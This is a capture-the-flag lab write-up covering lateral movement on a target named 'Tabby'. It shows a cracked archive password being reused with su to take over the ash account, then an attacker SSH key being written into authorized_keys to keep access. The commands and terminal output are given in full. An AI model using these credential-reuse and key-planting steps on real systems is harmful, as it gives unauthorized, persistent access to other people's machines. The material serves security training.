InfoSec LAB

Tabby_Lateral_Movement_ash

Created: 3 min read

Password Reuse

Checking for password reuse of the cracked archive password against the target SSH server

┌──(kali㉿kali)-[~/…/backup/var/www/html]
└─$ ssh ash@$IP
The authenticity of host '10.10.10.194 (10.10.10.194)' can't be established.
ed25519 key fingerprint is sha256:mUt3fTn2/uoySPc6XapKq69a2/3EPRdW0T79hZ2davk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
warning: Permanently added '10.10.10.194' (ED25519) to the list of known hosts.
ash@10.10.10.194: Permission denied (publickey).

Failed to connect to the target host via SSH as the target SSH server is configured to take authentication with key files ONLY

tomcat@tabby:/var/www/html/files$ su ash
password: admin@it
 
ash@tabby:/var/www/html/files$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

However, I can just change the current user from the existing shell session Password reuse confirmed for the ash user

In order to establish a stable shell session, I will attempt write my own SSH key into the authorized_keys file of the ash user

SSH

ash@tabby:/var/www/html/files$ ll ~/.ssh
ls: cannot access '/home/ash/.ssh': No such file or directory

The ash doesn’t even have the SSH directory

ash@tabby:/var/www/html/files$ mkdir ~/.ssh

I’ll make one

ash@tabby:/var/www/html/files$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys

Now, writing my own key to the authorized_keys file of the ash user

┌──(kali㉿kali)-[~/…/backup/var/www/html]
└─$ ssh ash@$IP -i ~/.ssh/id_ed25519                                                                                              255
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Sat 23 Sep 2023 12:09:50 PM UTC
 
  System load:  0.14              Processes:               231
  Usage of /:   52.4% of 6.82GB   Users logged in:         0
  Memory usage: 53%               IPv4 address for ens160: 10.10.10.194
  Swap usage:   0%
 
 
283 updates can be installed immediately.
152 of these updates are security updates.
To see these additional updates run: apt list --upgradable
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
 
Last login: Tue May 19 11:48:00 2020
ash@tabby:~$ whoami
ash
ash@tabby:~$ hostname
tabby
ash@tabby:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.194  netmask 255.255.255.0  broadcast 10.10.10.255
        ether 00:50:56:b9:7b:bb  txqueuelen 1000  (Ethernet)
        RX packets 2499629  bytes 406882415 (406.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2549609  bytes 1290995730 (1.2 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 22353  bytes 1742993 (1.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 22353  bytes 1742993 (1.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral Movement made to the ash user via SSH

Interactive Graph View

Backlinks